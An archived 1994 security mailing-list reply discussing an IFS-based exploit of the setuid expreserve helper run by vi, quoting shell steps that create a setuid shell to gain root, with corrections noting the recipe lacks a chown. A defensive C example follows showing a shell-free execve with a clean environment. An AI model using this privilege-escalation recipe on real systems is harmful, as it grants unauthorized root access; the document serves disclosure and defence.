Re: chmod 000 .rhosts - works?

Charles Howes (chowes@helix.net)
Mon, 17 Oct 1994 02:46:30 -0700 (PDT)

On Sun, 16 Oct 1994, Chris Ellwood wrote:

> Charles Howes said...
> > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
> >   versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
> >   with 'system()'.  So, do the following:
> >     % cd /tmp
> >     % cp /bin/sh fubar
> >     % cat > bin
> >     chmod 4755 fubar
> >     ^D
> >     % chmod u+x fubar
> 
> I see a couple problems with the script so far.  /bin/sh was copied
> to fubar while you are a regular user, so it will be owned by you
> and you'll end up with a nice copy of /bin/sh that's setuid to you,
> not your target user.  Also, that last line should probably read 
> 'chmod u+x bin', not fubar.

Ooops, forgot the chown.  Sigh.  Trust memory to lose things.

> >     % setenv IFS=/
> >     % vi
> >     :pre
> >     :q
> >     % fubar
> >     #
> >   Some versions of expreserve don't have the hole.
> >   Some versions of vi don't have the :pre command.
> >   One does not imply the other.
> 
> Thanks for posting it anyway.
> 
> - Chris
> 

--
Charles Howes -- chowes@helix.net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971
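
The hole discussed in this thread exists because a setuid program hands a command line to system(), so the caller's IFS and PATH influence how the shell interprets "/bin/mail". As an added example (not code from this post or from any vi/expreserve source), here is one way a privileged program can run its helper with no shell and a fixed environment; the names run_helper and CLEAN_ENV, and the choice to drop to the real uid before exec, are assumptions.

```c
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the helper; nothing is inherited from the caller. */
static char *const CLEAN_ENV[] = {
    "PATH=/usr/bin:/bin",
    "IFS= \t\n",
    NULL
};

/* Run an absolute-path helper without a shell.
 * Returns the helper's exit status, or -1 on failure. */
int run_helper(const char *path, char *const argv[])
{
    int status;
    pid_t pid;

    if (path == NULL || path[0] != '/')   /* refuse anything needing a PATH lookup */
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Assumption: the helper does not need root, so give up the
         * setuid/setgid identity for good before running it. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        /* No command line is parsed by a shell here, so IFS has nothing to split. */
        execve(path, argv, CLEAN_ENV);
        _exit(127);                       /* exec failed */
    }
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed demo command; a real caller would pass its mailer's path. */
    char *const argv[] = { "sh", "-c", "echo \"helper PATH=$PATH\"", NULL };
    return run_helper("/bin/sh", argv);
}
```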